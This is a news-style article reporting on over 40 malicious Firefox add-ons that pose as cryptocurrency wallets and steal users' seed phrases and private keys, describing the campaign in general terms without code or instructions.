While Mozilla’s Firefox browser is known for its privacy-focused features, its add-ons store has become a breeding ground for crypto thieves. Since April 2025, cybersecurity researchers have identified over 40 malicious extensions masquerading as popular cryptocurrency wallets like MetaMask, Coinbase, and Phantom. These aren’t your average copycats – they’re sophisticated operations run by Russian-speaking hackers who know exactly what they’re doing. Hardware wallets could have prevented many of these thefts by keeping private keys completely offline.
The scammers’ playbook is pretty clever, actually. They grab open-source wallet code, inject their malicious tweaks, and slap on some stolen branding. Mozilla has already taken down nearly all of the identified malicious add-ons in response. Then comes the social engineering – fake five-star reviews that somehow show more ratings than actual installations. Real smooth, guys.
These phony extensions sit there for weeks, waiting for unsuspecting users while Mozilla plays catch-up with its improved detection measures. The technical side is where it gets nasty. These fake wallets silently monitor for crypto credentials, hiding their tracks by making error messages invisible.
When users type in their seed phrases or private keys – poof! The data gets whisked away to the attackers’ servers, along with the victim’s IP address. Before anyone realizes what’s happened, the criminals have drained the wallets and laundered the funds through decentralized exchanges. Koi Security’s analysis revealed the extensive scope of this ongoing campaign.
The damage? Millions in stolen crypto, with high-profile victims watching their entire balances vanish across multiple blockchain networks. Mozilla acknowledges the threat, but new malicious extensions keep popping up faster than they can be removed. It’s like a game of whack-a-mole, except people are losing their life savings.
The threat actors remain at large, their operation showing no signs of slowing down. They’re technically sophisticated, persistent, and evolving their methods to dodge store reviews. While Mozilla implements stronger security measures, the Firefox Add-ons store remains a dangerous place for crypto users.
The exact amount stolen remains under wraps, but one thing’s crystal clear – these aren’t amateur hour hackers.
